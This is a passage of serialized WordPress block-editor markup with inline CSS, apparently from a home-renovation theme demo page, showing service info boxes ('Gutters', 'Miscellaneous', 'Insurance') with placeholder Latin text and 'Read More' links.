pack/gbrenovate/home/floor-modification/\",\"author\":\"1\",\"name\":\"floor-modification\",\"status\":\"inherit\",\"modified\":\"2021-05-28T05:39:15.000Z\",\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"dc1b7f19b6\",\"delete\":\"1f29bf8951\",\"edit\":\"ed86f5af8b\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=258u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":9306,\"filesizeHumanReadable\":\"9 KB\",\"context\":\"\",\"height\":66,\"width\":111,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"height\":66,\"width\":111,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":111,\"resshowPrefix\":false,\"counterId\":\"e1ad1827-531b-40c1-8789-14bfbfe4da88\"} -->\n<style type=\"text/css\"> .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img {\n width: 111px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"567cec0e-bcfe-4c69-9c80-5643480659ef\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-567cec0e-bcfe-4c69-9c80-5643480659ef\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":27,\"title\":\"services-img1\",\"filename\":\"services-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"598bfdc22b\",\"delete\":\"5d1b940541\",\"edit\":\"0a4d84ebf2\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=27u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3709,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":65,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"height\":65,\"width\":65,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":65,\"resshowPrefix\":false,\"counterId\":\"6144aa30-a171-49e0-ba02-9fdbf6c0339a\"} -->\n<style type=\"text/css\"> .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img {\n width: 65px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\"><strong>Miscellaneous</strong></h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"blockId\":\"d3c03c5f-5606-4310-98a4-30d73f9945ed\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d3c03c5f-5606-4310-98a4-30d73f9945ed\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":30,\"title\":\"services-img4\",\"filename\":\"services-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"632a5a602a\",\"delete\":\"eed2430960\",\"edit\":\"f2d09a400a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=30u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2845,\"filesizeHumanReadable\":\"3 KB\",\"context\":\"\",\"height\":66,\"width\":57,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"height\":66,\"width\":57,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":57,\"resshowPrefix\":false,\"counterId\":\"bbb98fc7-3a1c-40ca-8905-157ad2df8e24\"} -->\n<style type=\"text/css\"> .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img {\n width: 57px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Insurance</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6e721bfc-c727-4b32-a621-9a1dcc0e501c\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"colorLocation1\":68,\"colorLocation2\":44,\"backgroundColor1\":\"#072d69\",\"backgroundColor2\":\"#012257\",\"backgroundType\":\"gradient\",\"className\":\"gb-renovation-section-3\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-3 skt-blocks-block-section-outer-wrap block-6e721bfc-c727-4b32-a621-9a1dcc0e501c background-type-gradient alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-image:linear-gradient(90deg, rgba(7, 45, 105, 1) 68%,rgba(1, 34, 87, 1) 44%);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"994f6e51-2a17-435a-8b2f-9235a8bb8702\"} -->\n<style type=\"text/css\"> .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; 